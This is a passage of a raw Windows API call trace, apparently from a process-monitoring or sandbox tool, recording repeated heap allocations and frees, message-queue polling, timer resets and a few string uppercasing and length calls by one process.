(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01e0 | out: hHeap=0x2af0000) returned 1 [0085.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0085.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01c8 | out: hHeap=0x2af0000) returned 1 [0085.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01e0 | out: hHeap=0x2af0000) returned 1 [0085.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01c8 | out: hHeap=0x2af0000) returned 1 [0085.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0085.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729c8 | out: hHeap=0x2af0000) returned 1 [0085.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0085.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726c8 [0085.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729c8 [0085.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a28 [0085.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0085.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0085.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eeff8 [0085.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eef38 [0085.133] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef0a0 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0085.134] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79060 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726c8 [0085.134] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef0a0 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a726c8 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eef38 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eee18 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729c8 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a68 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eeff8 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef1c0 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef220 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29eeff8 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78f98 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef310 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79010 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef1c0 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0085.134] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a28 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef310 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef220 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0085.134] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef670 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a792e0 [0085.135] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0085.135] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef220 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72ac8 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79308 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef220 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef310 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78fe8 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef430 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a78 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a792e0 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef430 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef508 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729c8 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79060 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0085.135] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef220 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a88 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef520 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef5f8 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a68 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef670 [0085.135] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ef7d8 [0085.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79060 [0085.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef748 [0085.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a98 [0085.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79128 [0085.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef748 [0085.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef9e8 [0085.136] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a745e0 [0085.136] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 1 [0085.145] TranslateMessage (lpMsg=0x8ced68) returned 0 [0085.145] DispatchMessageW (lpMsg=0x8ced68) returned 0x0 [0085.145] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0085.145] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0085.146] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a28 [0085.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa00 | out: hHeap=0x2af0000) returned 1 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79088 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa30 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b78 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78ea8 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa48 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a68 [0085.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa48 | out: hHeap=0x2af0000) returned 1 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a790b0 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa48 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaa8 [0085.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79088 | out: hHeap=0x2af0000) returned 1 [0085.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0085.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa00 | out: hHeap=0x2af0000) returned 1 [0085.146] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79088 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaf0 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbb0 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0085.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0085.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe08 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a28 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f01c8 [0085.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0085.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01c8 | out: hHeap=0x2af0000) returned 1 [0085.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe08 | out: hHeap=0x2af0000) returned 1 [0085.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa00 | out: hHeap=0x2af0000) returned 1 [0085.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a28 [0085.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0085.147] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe08 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b38 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0270 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f01c8 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72ad8 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f01e0 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f02b8 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f04b0 [0085.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f04c8 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b48 [0085.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b48 | out: hHeap=0x2af0000) returned 1 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0510 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b48 [0085.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b48 | out: hHeap=0x2af0000) returned 1 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0528 [0085.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a28 [0085.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0828 [0085.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f04b0 | out: hHeap=0x2af0000) returned 1 [0085.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f02b8 | out: hHeap=0x2af0000) returned 1 [0085.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f04c8 | out: hHeap=0x2af0000) returned 1 [0085.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0510 | out: hHeap=0x2af0000) returned 1 [0085.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01e0 | out: hHeap=0x2af0000) returned 1 [0085.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ad8 | out: hHeap=0x2af0000) returned 1 [0085.148] lstrlenW (lpString="20") returned 2 [0085.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0528 | out: hHeap=0x2af0000) returned 1 [0085.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0085.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0828 | out: hHeap=0x2af0000) returned 1 [0085.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01c8 | out: hHeap=0x2af0000) returned 1 [0085.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0270 | out: hHeap=0x2af0000) returned 1 [0085.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b38 | out: hHeap=0x2af0000) returned 1 [0085.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0270 [0085.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f01c8 [0085.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a28 [0085.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe08 | out: hHeap=0x2af0000) returned 1 [0085.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa00 | out: hHeap=0x2af0000) returned 1 [0085.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01c8 | out: hHeap=0x2af0000) returned 1 [0085.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0085.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0270 | out: hHeap=0x2af0000) returned 1 [0085.148] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.148] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a28 [0085.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f01c8 [0085.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f01e0 [0085.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0085.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0270 [0085.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f02b8 [0085.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72ad8 [0085.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f04b0 [0085.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f04c8 [0085.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0085.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0510 [0085.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0528 [0085.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0085.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f08b8 [0085.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b68 [0085.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b68 | out: hHeap=0x2af0000) returned 1 [0085.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0738 [0085.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0085.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0768 [0085.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0510 | out: hHeap=0x2af0000) returned 1 [0085.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f04c8 | out: hHeap=0x2af0000) returned 1 [0085.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0528 | out: hHeap=0x2af0000) returned 1 [0085.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f08b8 | out: hHeap=0x2af0000) returned 1 [0085.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f04b0 | out: hHeap=0x2af0000) returned 1 [0085.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ad8 | out: hHeap=0x2af0000) returned 1 [0085.149] lstrlenW (lpString="32") returned 2 [0085.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0738 | out: hHeap=0x2af0000) returned 1 [0085.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0768 | out: hHeap=0x2af0000) returned 1 [0085.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f02b8 | out: hHeap=0x2af0000) returned 1 [0085.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0270 | out: hHeap=0x2af0000) returned 1 [0085.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0085.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0270 [0085.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f02b8 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0085.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01e0 | out: hHeap=0x2af0000) returned 1 [0085.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01c8 | out: hHeap=0x2af0000) returned 1 [0085.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0085.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f02b8 | out: hHeap=0x2af0000) returned 1 [0085.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0270 | out: hHeap=0x2af0000) returned 1 [0085.150] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.150] PeekMessageW (in: lpMsg=0x8ced68, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced68) returned 0 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f01c8 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f01e0 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a28 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0270 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f02b8 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72ad8 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f04b0 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0528 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f04c8 [0085.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0510 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0085.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0738 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0085.150] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0828 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0085.150] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0768 [0085.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f04c8 | out: hHeap=0x2af0000) returned 1 [0085.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0528 | out: hHeap=0x2af0000) returned 1 [0085.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0510 | out: hHeap=0x2af0000) returned 1 [0085.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0738 | out: hHeap=0x2af0000) returned 1 [0085.151] HeapFree (in: hHeap=0x2af0000, 